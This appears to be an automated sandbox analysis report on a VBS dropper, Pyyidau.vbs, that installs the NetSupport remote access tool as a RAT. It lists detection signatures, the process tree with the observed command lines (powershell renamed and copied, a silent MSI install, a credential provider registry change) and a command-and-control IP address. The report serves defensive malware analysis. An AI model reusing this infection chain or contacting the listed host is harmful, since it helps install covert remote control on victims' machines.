Windows Analysis Report
Pyyidau.vbs

Overview

General Information

Sample name: Pyyidau.vbs
Analysis ID: 1561295
MD5: c1108260f7a287cb16f93c11a40fbf90
SHA1: 8eab07aef27baae17d1ce013cce58b2b43dcaa1d
SHA256: 484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c
Tags: vbs, user-aachum
Infos:

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
.NET source code contains potential unpacker
AI detected suspicious sample
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to automate explorer (e.g. start an application)
Creates processes via WMI
Drops HTML or HTM files to system directories
Drops executables to the windows directory (C:\Windows) and starts them
Enables network access during safeboot for specific services
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Powershell is started from unusual location (likely to bypass HIPS)
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • wscript.exe (PID: 7060 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Pyyidau.vbs.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc 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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • msiexec.exe (PID: 6332 cmdline: "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • RegAsm.exe (PID: 6832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 2228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 7036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 2060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 6112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 4484 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 6176 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 2720 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1344 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3A MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • cmd.exe (PID: 5016 cmdline: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 3384 cmdline: ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • MSI264F.tmp (PID: 3992 cmdline: "C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • msiexec.exe (PID: 3888 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI2BE4.tmp (PID: 3084 cmdline: "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • checkdvd.exe (PID: 5936 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe" MD5: FE7D9DC26FF1615C13722E0F2DD3B815)
    • MSI3FCC.tmp (PID: 928 cmdline: "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * MD5: 0FCF65C63E08E77732224B2D5D959F13)
      • winst64.exe (PID: 2816 cmdline: winst64.exe /q /q /ex /i MD5: 96E987D909600D34DD70C55F56EB8869)
    • MSI51C1.tmp (PID: 6020 cmdline: "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • pcicfgui_client.exe (PID: 6340 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
      • pcicfgui_client.exe (PID: 6396 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
  • client32.exe (PID: 2676 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* * MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
    • client32.exe (PID: 6420 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
    • client32.exe (PID: 4296 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
      • cscript.exe (PID: 3352 cmdline: "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850 MD5: CB601B41D4C8074BE8A84AED564A94DC)
        • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • client32.exe (PID: 3904 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
  • svchost.exe (PID: 1892 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5720 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3084 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
No configs have been found
Source | Rule | Description | Author | Strings
C:\Windows\System32\drivers\nskbfltr.sys | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000003.2439151550.0000000008DD0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
36.2.pcicfgui_client.exe.6f950000.6.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
38.0.client32.exe.730000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
40.2.client32.exe.730000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
37.0.pcicfgui_client.exe.d40000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
36.2.pcicfgui_client.exe.d40000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

                                System Summary

                                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc 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
                                Source: Network Connection, Author: frack113, Florian Roth, Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc 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, ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 2916, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2496, ProcessName: wscript.exe
                                Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc 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, ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 2916, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2496, ProcessName: wscript.exe
                                Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 7060, ProcessName: wscript.exe
                                Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: Client32Provider, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, ProcessId: 2816, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{71C5A887-11E0-4c5a-9B9B-D4A074555692}\(Default)
                                Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Users\user\Desktop\Pyyidau.vbs.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzha1xoy.ipd.ps1
                                Source: Network Connection, Author: frack113, Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems), Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3904, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, ProcessId: 6176, ProcessName: cmd.exe
                                Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 2720, ParentProcessName: msiexec.exe, ProcessCommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", ProcessId: 5016, ProcessName: cmd.exe
                                Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 7060, ProcessName: wscript.exe
                                Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1892, ProcessName: svchost.exe
                                No Suricata rule has matched

                                AV Detection

                                Source: Pyyidau.vbs, ReversingLabs: Detection: 15%
                                Source: Pyyidau.vbs, Virustotal: Detection: 25%
                                Source: Submited Sample, Integrated Neural Analysis Model: Matched 97.4% probability
                                Source: C:\Windows\Installer\MSI3FCC.tmp, File created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI3FCC.tmp, File created: C:\Windows\setuperr.log
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, File opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: unknown, HTTPS traffic detected: 176.126.113.166:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb4 source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernel32.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701499634.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: winspool.pdbM source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcrt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wldap32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdb source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: pcicfgui_client.exe, 00000024.00000002.2673326583.00000000026C0000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000003.2750993608.0000000007200000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2801948506.0000000008B90000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdbD source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000024.00000000.2661196429.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, pcicfgui_client.exe, 00000024.00000002.2673004138.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, pcicfgui_client.exe, 00000025.00000002.2666174324.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: wkernel32.pdbbJdSo@ source: client32.exe, 00000026.00000002.2711261491.000000000713C000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb_ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nsi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdbi source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\StoreInvDll\Release\StoreInvDll.pdb source: client32.exe, 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, client32.exe, 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: msls31.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: secur32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000003.00000000.1717706981.0000000000271000.00000020.00000001.01000000.00000005.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb] source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: netutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
